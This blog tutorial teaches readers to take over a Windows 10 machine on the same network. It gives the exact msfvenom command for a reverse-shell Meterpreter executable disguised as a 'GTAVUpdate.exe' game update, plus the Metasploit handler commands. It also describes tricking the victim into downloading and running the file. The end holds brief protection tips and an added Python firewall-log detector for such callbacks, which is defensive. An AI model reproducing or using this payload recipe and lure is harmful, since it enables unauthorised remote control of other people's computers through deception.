In this post I’ll be teaching you how to hack Windows over the LAN (local area network); i.e. our victim is connected to the same network (hotspot/WiFi router).
Windows 10 needs to have the Windows Defender Firewall disabled. In this tutorial we will not cover Shellter to make the .exe FUD (Fully Undetectable), which is why we need to disable it.
SO LET’S GET STARTED!
Step 1 : Generate a payload using msfvenom
Before launching Metasploit, we need to find the local IP address of our Kali Linux machine.
For that, run `ip addr` or `ifconfig`.
Our local/private IP address is 192.168.195.72.
Now let’s get our hands dirty!
In the terminal, run the following command:
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows -f exe LHOST=192.168.195.72 LPORT=4444 -o /root/Desktop/GTAVUpdate.exe
The command above instructs msfvenom to generate a 32-bit Windows executable file that implements a reverse TCP connection for the payload. The format must be specified as being type .exe, and the local host (LHOST) and local port (LPORT) have to be defined. In our case, the LHOST is the IP address of our attacking Kali Linux machine that we got in the last command, and the LPORT is the port to listen on for a connection from the target once it has been compromised.
The name of the .exe is up to you. In this case I’ll be using GTAVUpdate.exe because our target is a gamer and we know he has GTA V.
Step 2 : Launch the Metasploit Framework
Launch Metasploit using the command `msfconsole` in the Kali Linux terminal.
Step 3 : Start reverse TCP handler
The screenshot below shows what commands to issue within Metasploit. First, we’ll tell Metasploit to use the generic payload handler “multi/handler” using the command `use multi/handler`. We will then set the payload to match the one set within the executable using the command `set payload windows/meterpreter/reverse_tcp`. We will then set the LHOST and LPORT this way: `set LHOST 192.168.195.72` and `set LPORT 4444`. Once done, type `run` or `exploit` and press Enter.
You can use `show options` to check that everything is OK, as shown below:
If everything is OK, type `run` or `exploit`, as shown below:
Step 4 : Social Engineering
Now you need to do some social engineering in order to make the user execute the program.
For this tutorial we will simply host the .exe on apache2 and transfer it to the Windows machine, as shown below:
On the Windows machine you just need to open IP/File.exe in the browser, as shown below:
In our case it is 192.168.192.72/GTAVUpdate.exe
Now run the GTAVUpdate.exe file on your victim’s computer and check the connection on your Kali machine.
As you can see we are now connected to the victim machine.
Now we can do a hell of a lot of things.
Now that you have access to the victim machine, type “help”, then go ahead and try out the various other functions of the meterpreter payload!
How to Protect
For this type of attack the most important thing is to have the Firewall enabled. Windows Defender does a good job of protecting against files like this.
Don’t forget to keep Windows up to date, and don’t execute programs unless you know for sure that they are original and signed.
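To complement the protection advice above, here is an added detection example (not part of the original post): it scans Windows Firewall log records for the trace this tutorial leaves, an HTTP download from a LAN host followed shortly by an outbound connection to the same host on an unexpected port. The log lines, the workstation address 192.168.195.80, the port allow-list and the time window are constructed assumptions, and it assumes firewall logging of allowed connections is turned on.

```python
import ipaddress
from datetime import datetime, timedelta

# Constructed sample in the Windows Firewall log (pfirewall.log) layout; not real traffic.
SAMPLE_LOG = """\
#Version: 1.5
#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path
2024-05-01 10:00:02 ALLOW TCP 192.168.195.80 192.168.195.72 49701 80 0 - 0 0 0 - - - SEND
2024-05-01 10:00:05 ALLOW TCP 192.168.195.80 203.0.113.10 49702 443 0 - 0 0 0 - - - SEND
2024-05-01 10:00:40 ALLOW TCP 192.168.195.80 192.168.195.1 49705 5357 0 - 0 0 0 - - - SEND
2024-05-01 10:01:10 ALLOW TCP 192.168.195.80 192.168.195.72 49710 4444 0 - 0 0 0 - - - SEND
"""

LAN = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
WEB_PORTS = {80, 8080}
EXPECTED_LAN_PORTS = {53, 135, 139, 443, 445}  # assumption: tune to your own network
WINDOW = timedelta(minutes=10)                 # assumption: download-to-callback gap

def parse(log_text):
    """Yield one dict per record, using the log's own #Fields header for column names."""
    fields = []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.strip() and not line.startswith("#") and fields:
            row = dict(zip(fields, line.split()))
            row["ts"] = datetime.strptime(f"{row['date']} {row['time']}", "%Y-%m-%d %H:%M:%S")
            yield row

def find_callbacks(log_text):
    """Flag outbound TCP to a LAN host on an unexpected port soon after an HTTP fetch from it."""
    last_fetch, alerts = {}, []   # last_fetch: (src, dst) -> time of latest HTTP request
    for r in parse(log_text):
        if (r["action"], r["protocol"], r.get("path")) != ("ALLOW", "TCP", "SEND"):
            continue
        dst = ipaddress.ip_address(r["dst-ip"])
        if not any(dst in net for net in LAN):
            continue  # only LAN peers are of interest for this pattern
        key, port = (r["src-ip"], r["dst-ip"]), int(r["dst-port"])
        if port in WEB_PORTS:
            last_fetch[key] = r["ts"]
        elif port not in EXPECTED_LAN_PORTS and r["ts"] - last_fetch.get(key, datetime.min) <= WINDOW:
            alerts.append((str(r["ts"]), r["src-ip"], r["dst-ip"], port))
    return alerts

if __name__ == "__main__":
    for alert in find_callbacks(SAMPLE_LOG):
        print("possible reverse-shell callback:", *alert)
```

The connection to 192.168.195.1 on port 5357 is not flagged because no download from that host preceded it; only the download-then-callback pair to 192.168.195.72 raises an alert.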
Hope you enjoyed. 🙂
If you face any kind of issue or need some help with its additional features, feel free to leave a comment or connect with me directly on my Instagram handle, my mail or my WhatsApp group; details are mentioned on my home page 🤗
daNiN hacking Tutorials